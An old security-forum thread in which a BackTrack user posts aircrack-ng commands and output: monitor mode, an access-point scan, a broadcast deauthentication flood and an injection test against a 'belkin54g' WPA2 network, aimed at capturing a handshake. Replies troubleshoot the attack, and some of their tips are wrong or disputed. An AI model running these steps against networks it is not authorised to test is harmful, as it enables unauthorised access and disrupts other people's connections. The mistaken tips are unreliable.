Results 1 to 6 of 6

Thread: Cant capture handshake

  1. #1
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    3

    Default Cant capture handshake

    Hi all,

    Im currently on backtrack 4 installed on my hdd.
    i have been trying for 2 days now to get a handshake.

    my steps :

    Code:
    root@bt:~# airmon-ng start wlan0
    
    
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID     Name
    3981    knetworkmanager
    4025    dhclient
    
    
    Interface       Chipset         Driver
    
    eth1            Intel 2100B     ipw2100
    wlan0           Broadcom        b43 - [phy0]
                                    (monitor mode enabled on mon0)
    airmon-ng wlan0
    Code:
     CH  1 ][ Elapsed: 28 s ][ 2009-06-19 10:01
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:12:BF:F8:3D:02  -83       14        0    0   1  54 . WPA  TKIP   PSK  SNV6520f83d00
     00:17:3F:B7:B1:3E  -87        2        0    0  11  54   WPA2 CCMP   PSK  belkin54g
    
     BSSID              STATION            PWR   Rate   Lost  Packets  Probe
    root@bt:~# airodump-ng -w WPA -c 11 --bssid 00:17:3F:B7:B1:3E wlan0
    Code:
     CH 11 ][ Elapsed: 20 s ][ 2009-06-19 10:03
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:17:3F:B7:B1:3E  -86  54       79        0    0  11  54   WPA2 CCMP   PSK  belkin54g
    
     BSSID              STATION            PWR   Rate   Lost  Packets  Probe
    Code:
    root@bt:~# aireplay-ng -0 10 -a 00:17:3F:B7:B1:3E wlan0
    10:05:47  Waiting for beacon frame (BSSID: 00:17:3F:B7:B1:3E) on channel 11
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    10:05:47  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:48  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:49  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:49  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:50  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:51  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:51  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:52  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:53  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:54  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    and no handshake , i know injection works

    Code:
    root@bt:~# aireplay-ng -9 -a 00:17:3F:B7:B1:3E wlan0
    For information, no action required: Using gettimeofday() instead of /dev/rtc
    10:06:57  Waiting for beacon frame (BSSID: 00:17:3F:B7:B1:3E) on channel 11
    10:07:04  Trying broadcast probe requests...
    10:07:05  Injection is working!
    10:07:06  Found 1 AP
    
    10:07:06  Trying directed probe requests...
    10:07:06  00:17:3F:B7:B1:3E - channel: 11 - 'belkin54g'
    10:07:10  Ping (min/avg/max): 3.199ms/18.740ms/50.933ms Power: -85.86
    10:07:10  30/30:  100%
    What am i missing ?

  2. #2
    Junior Member
    Join Date
    Jun 2009
    Posts
    30

    Default from last post

    Code:
     CH 11 ][ Elapsed: 20 s ][ 2009-06-19 10:03
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:17:3F:B7:B1:3E  -86  54       79        0    0  11  54   WPA2 CCMP   PSK  belkin54g
    
     BSSID              STATION            PWR   Rate   Lost  Packets  Probe


    You need to let the #data go up to 10k

    it should be to atleast 10000 before even trying to get a handshake

    The #data, will go up as the user is on the web

    Also,
    Not sure if it matters but this line is in the wrong order

    root@bt:~# airodump-ng -w WPA -c 11 --bssid 00:17:3F:B7:B1:3E wlan0

    Should be

    airodump-ng -c 11 -w WPA --bssid 00:17:3F:B7:B1:3E wlan0

    PS. If you wait for the #data to get to 10k I can almost guarantee that you will get the handshake.

    Let me know!

    Sean

  3. #3
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    Your using a broadcom, and that has so many bugs its not even funny.

    Get a better card and try again, also the last thing you posted doesn't prove injection is working at all.


    @sbolen28 - I'm hoping you misread his post, if not you need to do some homework

    cheers
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  4. #4
    Junior Member
    Join Date
    Jun 2009
    Posts
    30

    Default Yea

    I didnt missread, IM totally new to BT also.

    I had the same problem with the handshake, and noticed the data was 0 so thought that was his problem.

  5. #5
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    3

    Default

    thx for the reply's !

    The data isnt the problem , tryed to get a handshake with 10 000 packets earlyer.
    A new card isnt a option for the moment , maybe later.
    I did some good reading (i hope) , and found out no clients are connected to the AP.
    I think this is a problem with my wlan card , cause there is a AP , generating packets like a mofo , without any clients connected ( according to my card )
    but on the other site , i have a build in IWP2100 , witch normaly can monitor but he doesnt show any clients either , i have like 5 AP's floating around , and like never any associated clients.. somthings wrong

  6. #6
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by roxxor View Post
    Hi all,

    Im currently on backtrack 4 installed on my hdd.
    i have been trying for 2 days now to get a handshake.

    my steps :

    Code:
    root@bt:~# airmon-ng start wlan0
    
    
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID     Name
    3981    knetworkmanager
    4025    dhclient
    
    
    Interface       Chipset         Driver
    
    eth1            Intel 2100B     ipw2100
    wlan0           Broadcom        b43 - [phy0]
                                    (monitor mode enabled on mon0)
    airmon-ng wlan0
    Code:
     CH  1 ][ Elapsed: 28 s ][ 2009-06-19 10:01
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:12:BF:F8:3D:02  -83       14        0    0   1  54 . WPA  TKIP   PSK  SNV6520f83d00
     00:17:3F:B7:B1:3E  -87        2        0    0  11  54   WPA2 CCMP   PSK  belkin54g
    
     BSSID              STATION            PWR   Rate   Lost  Packets  Probe
    root@bt:~# airodump-ng -w WPA -c 11 --bssid 00:17:3F:B7:B1:3E wlan0
    Code:
     CH 11 ][ Elapsed: 20 s ][ 2009-06-19 10:03
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:17:3F:B7:B1:3E  -86  54       79        0    0  11  54   WPA2 CCMP   PSK  belkin54g
    
     BSSID              STATION            PWR   Rate   Lost  Packets  Probe
    Code:
    root@bt:~# aireplay-ng -0 10 -a 00:17:3F:B7:B1:3E wlan0
    10:05:47  Waiting for beacon frame (BSSID: 00:17:3F:B7:B1:3E) on channel 11
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    10:05:47  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:48  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:49  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:49  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:50  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:51  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:51  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:52  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:53  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:54  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    and no handshake , i know injection works

    Code:
    root@bt:~# aireplay-ng -9 -a 00:17:3F:B7:B1:3E wlan0
    For information, no action required: Using gettimeofday() instead of /dev/rtc
    10:06:57  Waiting for beacon frame (BSSID: 00:17:3F:B7:B1:3E) on channel 11
    10:07:04  Trying broadcast probe requests...
    10:07:05  Injection is working!
    10:07:06  Found 1 AP
    
    10:07:06  Trying directed probe requests...
    10:07:06  00:17:3F:B7:B1:3E - channel: 11 - 'belkin54g'
    10:07:10  Ping (min/avg/max): 3.199ms/18.740ms/50.933ms Power: -85.86
    10:07:10  30/30:  100%
    What am i missing ?
    Let's start from the beginning, should we?

    Have a look at the RED letters in your post. Few points, you should:
    1) Connect a client, then deauth it (with -1 attack) to get a handshake.
    2) Use mon0 as your interface instead of wlan0 after you enable the monitor mode. So, airmon-ng start wlan0 is correct but after this step, use mon0 in all other commands.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •